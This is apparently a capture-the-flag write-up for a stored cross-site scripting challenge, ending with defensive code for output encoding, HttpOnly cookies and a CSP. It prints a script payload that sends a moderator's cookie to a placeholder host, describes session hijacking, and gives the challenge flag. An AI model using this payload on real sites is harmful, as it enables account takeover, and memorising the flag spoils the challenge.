write-ups-challenges-2021-2022/moderated/SOLUTION.md
2021-12-03 00:33:26 +01:00

Difficulty

Difficult, 90 points

How to solve

The challenge consists of a small web application where you can register and log in. First you will need to register a new account, as you don't know any account credentials yet. After doing so you will be redirected to the login page, where you can use those credentials to log in.

After logging in, you will be presented with a page that lists your posts. At first, this page will be empty, but new posts can be created using the "Create post" link.

To solve the challenge, you will need to create a post that contains JavaScript, for example like this:

```html
<script>
window.top.location = "http://SOME_IP:SOME_PORT/?q="+document.cookie;
</script>
```

When you view an individual post, you will see that this HTML gets rendered and the script is executed on the client side of whoever is viewing the page. As each post needs to be reviewed by a moderator, we hope that the page gets viewed by a moderator and that the JavaScript gets executed, thereby stealing the moderator's cookie details.

For this to work, you will need an external server that is accessible from the internet on SOME_IP:SOME_PORT and logs all of the request information so that you can view it. At some point, the moderator will log in and view your post containing the malicious JavaScript. At this point, the cookie is leaked and can be replaced in your own browser (through the developer tools, for example).
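The attack works because the post page writes stored post content into the HTML unencoded and the session cookie is readable through `document.cookie`. The sketch below is an added example, not the challenge's own source code, showing the server-side fixes: output encoding, an `HttpOnly` cookie, and a CSP header as a second layer. The helper names, the cookie name and the sample values are assumptions.

```javascript
// Added example: hypothetical helpers, not taken from the challenge application.

// The five characters that let text break out of an HTML text node
// or a quoted attribute value.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one post for the detail view that the moderator opens.
// Title and body are user-controlled, so both are encoded before
// they are placed into the markup.
function renderPost(post) {
  return `<article><h1>${escapeHtml(post.title)}</h1><p>${escapeHtml(post.body)}</p></article>`;
}

// Build the Set-Cookie value for the session. HttpOnly keeps the value
// out of document.cookie, so an injected script cannot read it even if
// an encoding bug slips through somewhere else.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer: without 'unsafe-inline', inline <script> blocks do not run.
const CONTENT_SECURITY_POLICY =
  "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Constructed sample: the payload from this write-up stored as a post body.
const samplePost = {
  title: "Hello",
  body: '<script>window.top.location = "http://SOME_IP:SOME_PORT/?q="+document.cookie;</script>',
};

// Returns what the hardened application would send for the sample post.
function demo() {
  return {
    html: renderPost(samplePost),
    setCookie: sessionCookieHeader("session", "constructed-session-id"),
    csp: CONTENT_SECURITY_POLICY,
  };
}

console.log(demo());
```

With the encoding in place the payload is displayed as text in the moderator's browser instead of being parsed as a script element.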

Flag

IGCTF{BigTechWillnOtSiLenceUs}